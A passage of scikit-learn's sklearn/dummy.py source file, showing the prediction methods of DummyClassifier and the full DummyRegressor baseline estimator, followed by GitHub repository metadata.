y : array, shape = [n_samples] or [n_samples, n_outputs]
Predicted target values for X.
"""
if not hasattr(self, "classes_"):
raise ValueError("DummyClassifier not fitted.")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
# numpy random_state expects Python int and not long as size argument
# under Windows
n_samples = int(X.shape[0])
rs = check_random_state(self.random_state)
n_classes_ = self.n_classes_
classes_ = self.classes_
class_prior_ = self.class_prior_
constant = self.constant
if self.n_outputs_ == 1:
# Get same type even for self.n_outputs_ == 1
n_classes_ = [n_classes_]
classes_ = [classes_]
class_prior_ = [class_prior_]
constant = [constant]
# Compute probability only once
if self.strategy == "stratified":
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
proba = [proba]
if self.sparse_output_:
class_prob = None
if self.strategy == "most_frequent":
classes_ = [np.array([cp.argmax()]) for cp in class_prior_]
elif self.strategy == "stratified":
class_prob = class_prior_
elif self.strategy == "uniform":
raise ValueError("Sparse target prediction is not "
"supported with the uniform strategy")
elif self.strategy == "constant":
classes_ = [np.array([c]) for c in constant]
y = random_choice_csc(n_samples, classes_, class_prob,
self.random_state)
else:
if self.strategy == "most_frequent":
y = np.tile([classes_[k][class_prior_[k].argmax()] for
k in range(self.n_outputs_)], [n_samples, 1])
elif self.strategy == "stratified":
y = np.vstack(classes_[k][proba[k].argmax(axis=1)] for
k in range(self.n_outputs_)).T
elif self.strategy == "uniform":
ret = [classes_[k][rs.randint(n_classes_[k], size=n_samples)]
for k in range(self.n_outputs_)]
y = np.vstack(ret).T
elif self.strategy == "constant":
y = np.tile(self.constant, (n_samples, 1))
if self.n_outputs_ == 1 and not self.output_2d_:
y = np.ravel(y)
return y
def predict_proba(self, X):
"""
Return probability estimates for the test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
P : array-like or list of array-lke of shape = [n_samples, n_classes]
Returns the probability of the sample for each class in
the model, where classes are ordered arithmetically, for each
output.
"""
if not hasattr(self, "classes_"):
raise ValueError("DummyClassifier not fitted.")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
# numpy random_state expects Python int and not long as size argument
# under Windows
n_samples = int(X.shape[0])
rs = check_random_state(self.random_state)
n_classes_ = self.n_classes_
classes_ = self.classes_
class_prior_ = self.class_prior_
constant = self.constant
if self.n_outputs_ == 1 and not self.output_2d_:
# Get same type even for self.n_outputs_ == 1
n_classes_ = [n_classes_]
classes_ = [classes_]
class_prior_ = [class_prior_]
constant = [constant]
P = []
for k in range(self.n_outputs_):
if self.strategy == "most_frequent":
ind = np.ones(n_samples, dtype=int) * class_prior_[k].argmax()
out = np.zeros((n_samples, n_classes_[k]), dtype=np.float64)
out[:, ind] = 1.0
elif self.strategy == "stratified":
out = rs.multinomial(1, class_prior_[k], size=n_samples)
elif self.strategy == "uniform":
out = np.ones((n_samples, n_classes_[k]), dtype=np.float64)
out /= n_classes_[k]
elif self.strategy == "constant":
ind = np.where(classes_[k] == constant[k])
out = np.zeros((n_samples, n_classes_[k]), dtype=np.float64)
out[:, ind] = 1.0
P.append(out)
if self.n_outputs_ == 1 and not self.output_2d_:
P = P[0]
return P
def predict_log_proba(self, X):
"""
Return log probability estimates for the test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
P : array-like or list of array-like of shape = [n_samples, n_classes]
Returns the log probability of the sample for each class in
the model, where classes are ordered arithmetically for each
output.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
return [np.log(p) for p in proba]
class DummyRegressor(BaseEstimator, RegressorMixin):
"""
DummyRegressor is a regressor that makes predictions using
simple rules.
This regressor is useful as a simple baseline to compare with other
(real) regressors. Do not use it for real problems.
Parameters
----------
strategy : str
Strategy to use to generate predictions.
* "mean": always predicts the mean of the training set
* "median": always predicts the median of the training set
* "quantile": always predicts a specified quantile of the training set,
provided with the quantile parameter.
* "constant": always predicts a constant value that is provided by
the user.
constant : int or float or array of shape = [n_outputs]
The explicit constant as predicted by the "constant" strategy. This
parameter is useful only for the "constant" strategy.
quantile : float in [0.0, 1.0]
The quantile to predict using the "quantile" strategy. A quantile of
0.5 corresponds to the median, while 0.0 to the minimum and 1.0 to the
maximum.
Attributes
----------
constant_ : float or array of shape [n_outputs]
Mean or median or quantile of the training targets or constant value
given by the user.
n_outputs_ : int,
Number of outputs.
outputs_2d_ : bool,
True if the output at fit is 2d, else false.
"""
def __init__(self, strategy="mean", constant=None, quantile=None):
self.strategy = strategy
self.constant = constant
self.quantile = quantile
def fit(self, X, y, sample_weight=None):
"""Fit the random regressor.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
Target values.
sample_weight : array-like of shape = [n_samples], optional
Sample weights.
Returns
-------
self : object
Returns self.
"""
if self.strategy not in ("mean", "median", "quantile", "constant"):
raise ValueError("Unknown strategy type: %s, expected "
"'mean', 'median', 'quantile' or 'constant'"
% self.strategy)
y = check_array(y, ensure_2d=False)
if len(y) == 0:
raise ValueError("y must not be empty.")
self.output_2d_ = y.ndim == 2
if y.ndim == 1:
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
check_consistent_length(X, y, sample_weight)
if self.strategy == "mean":
self.constant_ = np.average(y, axis=0, weights=sample_weight)
elif self.strategy == "median":
if sample_weight is None:
self.constant_ = np.median(y, axis=0)
else:
self.constant_ = [_weighted_percentile(y[:, k], sample_weight,
percentile=50.)
for k in range(self.n_outputs_)]
elif self.strategy == "quantile":
if self.quantile is None or not np.isscalar(self.quantile):
raise ValueError("Quantile must be a scalar in the range "
"[0.0, 1.0], but got %s." % self.quantile)
percentile = self.quantile * 100.0
if sample_weight is None:
self.constant_ = np.percentile(y, axis=0, q=percentile)
else:
self.constant_ = [_weighted_percentile(y[:, k], sample_weight,
percentile=percentile)
for k in range(self.n_outputs_)]
elif self.strategy == "constant":
if self.constant is None:
raise TypeError("Constant target value has to be specified "
"when the constant strategy is used.")
self.constant = check_array(self.constant,
accept_sparse=['csr', 'csc', 'coo'],
ensure_2d=False, ensure_min_samples=0)
if self.output_2d_ and self.constant.shape[0] != y.shape[1]:
raise ValueError(
"Constant target value should have "
"shape (%d, 1)." % y.shape[1])
self.constant_ = self.constant
self.constant_ = np.reshape(self.constant_, (1, -1))
return self
def predict(self, X):
"""
Perform classification on test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
y : array, shape = [n_samples] or [n_samples, n_outputs]
Predicted target values for X.
"""
if not hasattr(self, "constant_"):
raise ValueError("DummyRegressor not fitted.")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
n_samples = X.shape[0]
y = np.ones((n_samples, 1)) * self.constant_
if self.n_outputs_ == 1 and not self.output_2d_:
y = np.ravel(y)
return y
| {
"content_hash": "6c0f90f4aa6bc5f9f3f4e2a6b3c76899",
"timestamp": "",
"source": "github",
"line_count": 464,
"max_line_length": 79,
"avg_line_length": 36.185344827586206,
"alnum_prop": 0.549434187016081,
"repo_name": "icdishb/scikit-learn",
"id": "196aefb45b0b71f06004ce198b5d47f203f8644f",
"size": "16967",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "sklearn/dummy.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1786"
},
{
"name": "C",
"bytes": "385829"
},
{
"name": "C++",
"bytes": "139482"
},
{
"name": "Makefile",
"bytes": "1364"
},
{
"name": "PowerShell",
"bytes": "13427"
},
{
"name": "Python",
"bytes": "5721648"
},
{
"name": "Shell",
"bytes": "4182"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.